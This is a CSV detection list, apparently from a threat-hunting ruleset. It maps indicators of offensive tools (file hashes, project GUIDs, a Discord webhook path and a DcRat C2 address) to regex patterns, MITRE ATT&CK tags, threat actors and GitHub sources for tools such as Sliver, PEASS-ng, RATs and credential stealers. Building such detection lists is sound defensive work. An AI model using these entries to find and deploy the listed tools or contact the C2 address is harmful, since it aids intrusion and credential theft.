"*10fcc7c086208b672ba3c954ce137842102312529937ebd2c3f8060ba70803af*",".{0,1000}10fcc7c086208b672ba3c954ce137842102312529937ebd2c3f8060ba70803af.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21933"
"*10k-worst-pass.txt*",".{0,1000}10k\-worst\-pass\.txt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","21934"
"*110065fdfaa8e7ef46a45506982ae606af7d50b8d10fe008899b0a9abe4013b5*",".{0,1000}110065fdfaa8e7ef46a45506982ae606af7d50b8d10fe008899b0a9abe4013b5.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","21935"
"*11055d6a12b8735ded0fe5289323c15cd237caa413c0aca76951b3b3a4178806*",".{0,1000}11055d6a12b8735ded0fe5289323c15cd237caa413c0aca76951b3b3a4178806.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","21936"
"*1106565073956253736/mEDRS5iY0S4sgUnRh8Q5pC4S54zYwczZhGOwXvR3vKr7YQmA0Ej1-Ig60Rh4P_TGFq-m*",".{0,1000}1106565073956253736\/mEDRS5iY0S4sgUnRh8Q5pC4S54zYwczZhGOwXvR3vKr7YQmA0Ej1\-Ig60Rh4P_TGFq\-m.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21937"
"*1107ec321a60c6b0a500475efd25bf81e12b743c2270cc0482adc7ced6339a57*",".{0,1000}1107ec321a60c6b0a500475efd25bf81e12b743c2270cc0482adc7ced6339a57.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21938"
"*1107ec321a60c6b0a500475efd25bf81e12b743c2270cc0482adc7ced6339a57*",".{0,1000}1107ec321a60c6b0a500475efd25bf81e12b743c2270cc0482adc7ced6339a57.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21939"
"*1107ec321a60c6b0a500475efd25bf81e12b743c2270cc0482adc7ced6339a57*",".{0,1000}1107ec321a60c6b0a500475efd25bf81e12b743c2270cc0482adc7ced6339a57.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21940"
"*1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a*",".{0,1000}1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21942"
"*1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a*",".{0,1000}1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21943"
"*1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a*",".{0,1000}1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21944"
"*1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a*",".{0,1000}1114bbdd9da82e10229805d40ab46ce31fc7a8f57b7ee53d47fa337f5937361a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21945"
"*1119pepesneakyevil*",".{0,1000}1119pepesneakyevil.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","21946"
"*111BB935-2A0A-4AE2-AEB0-EF2FAA529840*",".{0,1000}111BB935\-2A0A\-4AE2\-AEB0\-EF2FAA529840.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21947"
"*111c72f8a97ce4e1bdfcf1815c4ec433618e7a6c1c73c567f1059d2175357c42*",".{0,1000}111c72f8a97ce4e1bdfcf1815c4ec433618e7a6c1c73c567f1059d2175357c42.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","21948"
"*112113a092929c5abc34a05a2d4c42f736a23ea7ef66c23b5e005586db1e2fe2*",".{0,1000}112113a092929c5abc34a05a2d4c42f736a23ea7ef66c23b5e005586db1e2fe2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21949"
"*11350f8f9a6296d6c3d2e74857bd3d81d180134e4cb5320fc42795f6922c1a02*",".{0,1000}11350f8f9a6296d6c3d2e74857bd3d81d180134e4cb5320fc42795f6922c1a02.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21951"
"*11360c9e4f50a098a4abfc0d6c6d19b8fa73ca872c462dc4e9b3d6a24a5abb22*",".{0,1000}11360c9e4f50a098a4abfc0d6c6d19b8fa73ca872c462dc4e9b3d6a24a5abb22.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","21952"
"*11385CC1-54B7-4968-9052-DF8BB1961F1E*",".{0,1000}11385CC1\-54B7\-4968\-9052\-DF8BB1961F1E.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","21954"
"*1138a233a5a8d32e0731281ff9acedc0d930998a243d3fe11151cbc226ceb5af*",".{0,1000}1138a233a5a8d32e0731281ff9acedc0d930998a243d3fe11151cbc226ceb5af.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21955"
"*1141183bf4a5fdb8a92a4bb9ae2278ec6391e1bc96ebee10245ad8a416372bd9*",".{0,1000}1141183bf4a5fdb8a92a4bb9ae2278ec6391e1bc96ebee10245ad8a416372bd9.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","21958"
"*1141183bf4a5fdb8a92a4bb9ae2278ec6391e1bc96ebee10245ad8a416372bd9*",".{0,1000}1141183bf4a5fdb8a92a4bb9ae2278ec6391e1bc96ebee10245ad8a416372bd9.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","21959"
"*1145c0adcdf15ea7ac30cb824c417b356f15722dc2039aa6a3ffe67c2cc3bbd0*",".{0,1000}1145c0adcdf15ea7ac30cb824c417b356f15722dc2039aa6a3ffe67c2cc3bbd0.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21960"
"*1145de7228a8791659911e809cf8841fea94a38ade1488a647310857201344a5*",".{0,1000}1145de7228a8791659911e809cf8841fea94a38ade1488a647310857201344a5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21961"
"*115309fcd130393cc85154585caf9ef08f101133c5fa27307469f02f3e8c1461*",".{0,1000}115309fcd130393cc85154585caf9ef08f101133c5fa27307469f02f3e8c1461.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21962"
"*115582571181b99e7b64918a94fe75c24eba2a95da256fff85799d19e6a47b17*",".{0,1000}115582571181b99e7b64918a94fe75c24eba2a95da256fff85799d19e6a47b17.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21964"
"*115ac6d10a371a9f22cdf0190e84a5a4c4d5b4b625bf8d571d68f95b507424e5*",".{0,1000}115ac6d10a371a9f22cdf0190e84a5a4c4d5b4b625bf8d571d68f95b507424e5.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","21965"
"*1160bcaa562e5a40c74e633ec58a2518b110e74b1d3f48bfa06f74f72cf9ff98*",".{0,1000}1160bcaa562e5a40c74e633ec58a2518b110e74b1d3f48bfa06f74f72cf9ff98.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21966"
"*116472CE-3924-40EA-90F9-50A1A00D0EC5*",".{0,1000}116472CE\-3924\-40EA\-90F9\-50A1A00D0EC5.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","21967"
"*11754456d43dc010e48cc2b5294d3a7d84f3a28bd27fd8183a3162ede955e30b*",".{0,1000}11754456d43dc010e48cc2b5294d3a7d84f3a28bd27fd8183a3162ede955e30b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21969"
"*11802597962f345ac2b1c9cd161eee89862b153a06ec00c90b84889f5d094379*",".{0,1000}11802597962f345ac2b1c9cd161eee89862b153a06ec00c90b84889f5d094379.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21972"
"*1182b15d8277fa6ea660c74b71599cb2417bdc28c889215514f414978a26a9d3*",".{0,1000}1182b15d8277fa6ea660c74b71599cb2417bdc28c889215514f414978a26a9d3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21973"
"*1189360f7da03490a9f0f3ce283d487335a4db24232d6fabfd17bc7ec4e53392*",".{0,1000}1189360f7da03490a9f0f3ce283d487335a4db24232d6fabfd17bc7ec4e53392.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","21974"
"*118c2a7d06f9ac1aabdec653f236e04f3a697f59bef6f4e9c9ca1ea8acdc33db*",".{0,1000}118c2a7d06f9ac1aabdec653f236e04f3a697f59bef6f4e9c9ca1ea8acdc33db.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","21975"
"*118c2a7d06f9ac1aabdec653f236e04f3a697f59bef6f4e9c9ca1ea8acdc33db*",".{0,1000}118c2a7d06f9ac1aabdec653f236e04f3a697f59bef6f4e9c9ca1ea8acdc33db.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","21976"
"*118e93d0a030df314b4e592e9470c9ae9d6c40de1417714172a95891248a2365*",".{0,1000}118e93d0a030df314b4e592e9470c9ae9d6c40de1417714172a95891248a2365.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","21977"
"*119.45.104.153:8848*",".{0,1000}119\.45\.104\.153\:8848.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","21978"
"*11a5d052cdb215ea23fad710c786f4b71f7a5c76f18d76d8fc97750ea4eaa403*",".{0,1000}11a5d052cdb215ea23fad710c786f4b71f7a5c76f18d76d8fc97750ea4eaa403.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21979"
"*11a615149ed94d8057a6284d582f19d0b1f2c01a36f63f0b267cff32ba3bf06f*",".{0,1000}11a615149ed94d8057a6284d582f19d0b1f2c01a36f63f0b267cff32ba3bf06f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","21980"
"*11a92a7c6a84715416eb8a1c033a6a8db9a70494bfc08c9f09734e599be76cef*",".{0,1000}11a92a7c6a84715416eb8a1c033a6a8db9a70494bfc08c9f09734e599be76cef.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","21982"
"*11ae0608b6218b088dc3880ab366c93247bc33665a8a7f14b9da4d450e449dfe*",".{0,1000}11ae0608b6218b088dc3880ab366c93247bc33665a8a7f14b9da4d450e449dfe.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21983"
"*11b29c6bbbcb4bf9dc59b7b308de0da0f13e5f6116a3f10dffe76f4f927ccd8b*",".{0,1000}11b29c6bbbcb4bf9dc59b7b308de0da0f13e5f6116a3f10dffe76f4f927ccd8b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21984"
"*11c1761a8b341699d52bc16698a43ea3193518818323307d82c41763893fbdd2*",".{0,1000}11c1761a8b341699d52bc16698a43ea3193518818323307d82c41763893fbdd2.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","21988"
"*11c46949df91b0ddef22dba8eef0767e316cc7829b4d41408da3bc21f1e07e48*",".{0,1000}11c46949df91b0ddef22dba8eef0767e316cc7829b4d41408da3bc21f1e07e48.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","21989"
"*11c8f70aac612dfbe48ee5c4be2984d0c32a3a15b4a33f3b352adc7cbdb8c937*",".{0,1000}11c8f70aac612dfbe48ee5c4be2984d0c32a3a15b4a33f3b352adc7cbdb8c937.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21990"
"*11cb4947c8f8e84c34512070b1ead707af5e948b82937f32e15df293269e678d*",".{0,1000}11cb4947c8f8e84c34512070b1ead707af5e948b82937f32e15df293269e678d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21991"
"*11cc4ad77bf6c0db1f6b3f8b85ae6ee230c3ca7e1425b63b7c1fe1b51c53b048*",".{0,1000}11cc4ad77bf6c0db1f6b3f8b85ae6ee230c3ca7e1425b63b7c1fe1b51c53b048.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21992"
"*11d8e391f72c4950369727c3bb5071ecb806326d1631556183d7ac403e128d97*",".{0,1000}11d8e391f72c4950369727c3bb5071ecb806326d1631556183d7ac403e128d97.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21994"
